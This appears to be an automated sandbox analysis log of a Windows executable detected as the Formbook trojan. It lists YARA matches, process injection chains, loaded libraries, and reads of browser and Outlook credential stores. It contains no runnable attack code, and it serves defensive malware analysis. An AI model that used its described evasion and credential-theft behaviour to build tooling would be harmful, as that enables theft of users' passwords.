Source: 2.2.svchost.exe.600000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.600000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1583707239.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3915191232.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3897905735.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3915118519.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1584717974.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1583886010.0000000002930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3915054497.0000000003230000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@14/12
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C2A2D5 GetLastError,FormatMessageW, 0_2_00C2A2D5
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C18713 AdjustTokenPrivileges,CloseHandle, 0_2_00C18713
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C18CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00C18CC3
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C2B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_00C2B59E
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C3F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00C3F121
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C386D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 0_2_00C386D0
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BC4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00BC4FE9
Source: C:\Users\user\Desktop\150-425-2024.exe File created: C:\Users\user\AppData\Local\Temp\aut52A6.tmp Jump to behavior
Source: 150-425-2024.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: netbtugc.exe, 00000004.00000003.1769072522.0000000002C51000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1769072522.0000000002C72000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1768993413.0000000002C87000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1770200109.0000000002CA7000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3910307845.0000000002C72000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1770200109.0000000002C72000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3910307845.0000000002CA7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 150-425-2024.exe ReversingLabs: Detection: 47%
Source: 150-425-2024.exe Virustotal: Detection: 28%
Source: unknown Process created: C:\Users\user\Desktop\150-425-2024.exe "C:\Users\user\Desktop\150-425-2024.exe"
Source: C:\Users\user\Desktop\150-425-2024.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\150-425-2024.exe"
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\150-425-2024.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\150-425-2024.exe" Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: 150-425-2024.exe Static file information: File size 1528320 > 1048576
Source: 150-425-2024.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 150-425-2024.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 150-425-2024.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 150-425-2024.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 150-425-2024.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 150-425-2024.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 150-425-2024.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000000.1505609494.00000000006BE000.00000002.00000001.01000000.00000004.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000000.1655891040.00000000006BE000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP source: 150-425-2024.exe, 00000000.00000003.1447380115.0000000004020000.00000004.00001000.00020000.00000000.sdmp, 150-425-2024.exe, 00000000.00000003.1444736163.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1491506539.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1584116157.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1584116157.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1489430739.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3917880903.000000000340E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3917880903.0000000003270000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1587522806.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1584000279.0000000002F12000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 150-425-2024.exe, 00000000.00000003.1447380115.0000000004020000.00000004.00001000.00020000.00000000.sdmp, 150-425-2024.exe, 00000000.00000003.1444736163.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1491506539.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1584116157.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1584116157.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1489430739.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.3917880903.000000000340E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3917880903.0000000003270000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1587522806.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1584000279.0000000002F12000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.1583975523.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1548871766.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000002.3914413395.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3910307845.0000000002BEE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3918311897.000000000389C000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000000.1656364665.0000000002F8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1874354603.000000003887C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3910307845.0000000002BEE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3918311897.000000000389C000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000000.1656364665.0000000002F8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1874354603.000000003887C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.1583975523.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1548871766.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000002.3914413395.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
Source: 150-425-2024.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 150-425-2024.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 150-425-2024.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 150-425-2024.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 150-425-2024.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C3C304 LoadLibraryA,GetProcAddress, 0_2_00C3C304
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BE8B85 push ecx; ret 0_2_00BE8B98
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_006048A9 push esp; ret 2_2_006048AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0061E2BA push 00000038h; iretd 2_2_0061E2BE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0061A436 push ebx; iretd 2_2_0061A600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00618C92 pushad ; retf 2_2_00618C93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0061A5D9 push ebx; iretd 2_2_0061A600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_006017E5 push ebp; retf 003Fh 2_2_006017E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_006147A2 push es; iretd 2_2_006147AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00603780 push eax; ret 2_2_00603782
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0320225F pushad ; ret 2_2_032027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032027FA pushad ; ret 2_2_032027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032309AD push ecx; mov dword ptr [esp], ecx 2_2_032309B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0320283D push eax; iretd 2_2_03202858
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0320135E push eax; iretd 2_2_03201369
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032A09AD push ecx; mov dword ptr [esp], ecx 4_2_032A09B6
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A1101F push es; iretd 4_2_00A11027
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A1D1B0 push es; ret 4_2_00A1D1D0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A01126 push esp; ret 4_2_00A01127
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A12238 pushad ; iretd 4_2_00A12239
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A1550F pushad ; retf 4_2_00A15510
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A1AB37 push 00000038h; iretd 4_2_00A1AB3B
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A16CB3 push ebx; iretd 4_2_00A16E7D
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A10EAB push ebp; retf 4_2_00A10EAC
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A1FEF5 push FFFFFFBAh; ret 4_2_00A1FEF7
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A16E56 push ebx; iretd 4_2_00A16E7D
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A0FFA0 push esi; iretd 4_2_00A0FFA5
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BC4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00BC4A35
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C455FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00C455FD
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00BE33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00BE33C7
Source: C:\Users\user\Desktop\150-425-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0327096E rdtsc 2_2_0327096E
Source: C:\Windows\SysWOW64\netbtugc.exe Window / User API: threadDelayed 9714 Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe API coverage: 5.0 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\netbtugc.exe API coverage: 2.7 %
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7868 Thread sleep count: 258 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7868 Thread sleep time: -516000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7868 Thread sleep count: 9714 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7868 Thread sleep time: -19428000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe TID: 7876 Thread sleep time: -70000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe TID: 7876 Thread sleep time: -43500s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe TID: 7876 Thread sleep count: 33 > 30 Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe TID: 7876 Thread sleep time: -33000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C24696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00C24696
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00C2C9C7
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C2C93C FindFirstFileW,FindClose, 0_2_00C2C93C
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C2F200
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C2F35D
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C2F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00C2F65E
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C23A2B
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C23D4E
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C2BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00C2BF27
